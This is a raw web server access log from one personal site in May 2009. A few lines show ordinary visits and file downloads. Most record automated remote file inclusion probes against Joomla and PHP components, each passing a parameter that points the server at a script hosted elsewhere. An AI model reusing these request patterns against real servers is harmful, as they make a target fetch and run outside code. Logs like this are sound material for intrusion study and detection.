74.54.241.100 - - [05/May/2009:09:35:33 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.153.184 - - [05/May/2009:09:35:33 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:35:47 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:04 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:04 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:05 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:05 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:36:06 -0700] "GET /logs/access_081013.log///vwar/backup/errors.php?error=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:09 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:36:09 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.54.200 - - [05/May/2009:09:36:59 -0700] "GET /logs/access_080806.log//index.php?content=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:37:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.54.200 - - [05/May/2009:09:37:04 -0700] "GET /logs//index.php?content=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:37:12 -0700] "GET /logs/access_081106.log%20%20//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:37:17 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:37:19 -0700] "GET /logs/access_080227.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:37:23 -0700] "GET /logs/access_081105.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:37:23 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:37:23 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:09:37:34 -0700] "GET /logs/access_080412.log%20%20//zentrack/index.php?configFile=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:37:34 -0700] "GET /logs/access_090126.log//poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:37:35 -0700] "GET /poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:09:37:35 -0700] "GET /logs//poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:37:38 -0700] "GET /include/write.php?dir=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:37:38 -0700] "GET /logs//include/write.php?dir=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:37:38 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:37:39 -0700] "GET /logs/access_080708.log//include/write.php?dir=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.54.200 - - [05/May/2009:09:37:42 -0700] "GET /index.php?content=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 200 42969 "-" "libwww-perl/5.813" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:38:27 -0700] "GET //vwar/backup/errors.php?error=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:38:27 -0700] "GET /logs///vwar/backup/errors.php?error=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:38:27 -0700] "GET /logs/access_080902.log///vwar/backup/errors.php?error=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:38:28 -0700] "GET /logs/access_080320.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:38:28 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:38:38 -0700] "GET /logs/access_080320.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:38:38 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:38:45 -0700] "GET /logs/access_081231.log%20%20//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:38:49 -0700] "GET /logs/access_080320.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:38:50 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:09:38:52 -0700] "GET /logs/access_080514.log%20%20//zentrack/index.php?configFile=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.171 - - [05/May/2009:09:38:57 -0700] "GET /bikes/dteel/2008_07_03/?M=A HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:09:38:59 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:39:08 -0700] "GET /logs/access_080821.log/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:39:49 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:39:56 -0700] "GET /logs/access_081105.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:39:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:39:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
94.23.54.200 - - [05/May/2009:09:39:57 -0700] "GET /logs/access_090228.log//index.php?content=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:40:06 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:40:11 -0700] "GET /logs/access_080529.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [05/May/2009:09:40:22 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [05/May/2009:09:40:22 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:40:24 -0700] "GET /logs/access_081222.log/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.54.200 - - [05/May/2009:09:40:33 -0700] "GET /index.php?content=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 200 42969 "-" "libwww-perl/5.813" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:40:38 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:40:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:03 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:03 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:03 -0700] "GET /logs/access_090308.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:05 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:05 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:05 -0700] "GET /logs/access_090308.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:41:10 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:41:10 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:14 -0700] "GET /logs/access_090221.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [05/May/2009:09:41:19 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 200 43071 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:41:25 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:41:31 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:41:31 -0700] "GET /logs/access_080227.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:41:31 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:41:35 -0700] "GET /logs/access_080523.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:41:40 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
217.112.35.52 - - [05/May/2009:09:41:47 -0700] "GET /logs/?path%5Bdocroot%5D=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 98189 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:41:59 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:41:59 -0700] "GET /logs/access_080313.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:42:00 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:42:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:42:05 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:42:17 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:42:30 -0700] "GET /logs/access_080515.log/errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:42:31 -0700] "GET /errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:42:31 -0700] "GET /logs/errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.112.35.52 - - [05/May/2009:09:42:42 -0700] "GET /?path%5Bdocroot%5D=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 42931 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:42:53 -0700] "GET /logs/access_081220.log%20//include/write.php?dir=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:08 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:43:23 -0700] "GET /logs/access_080227.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:43:26 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:43:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:43:27 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:33 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.208.161.124 - - [05/May/2009:09:43:43 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 277018 "http://www.st-owners.com/forums/newreply.php?do=postreply&t=63518" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
66.226.153.1 - - [05/May/2009:09:43:52 -0700] "GET /logs/access_080523.log%20%20//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:43:54 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.1.102.190 - - [05/May/2009:09:43:56 -0700] "GET /logs/access_081209.log/errors.php?error=http://usuarios.lycos.es/workink/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:44:21 -0700] "GET /logs/access_090415.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [05/May/2009:09:44:32 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [05/May/2009:09:44:32 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [05/May/2009:09:44:32 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [05/May/2009:09:44:32 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:44:32 -0700] "GET /logs/access_090308.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:44:34 -0700] "GET /logs/access_090221.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:44:42 -0700] "GET /logs/access_090415.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:45:56 -0700] "GET /logs/access_080529.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [05/May/2009:09:46:28 -0700] "GET /logs/access_080808.log/squirrelcart/cart_content.php?cart_isp_root=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [05/May/2009:09:46:29 -0700] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
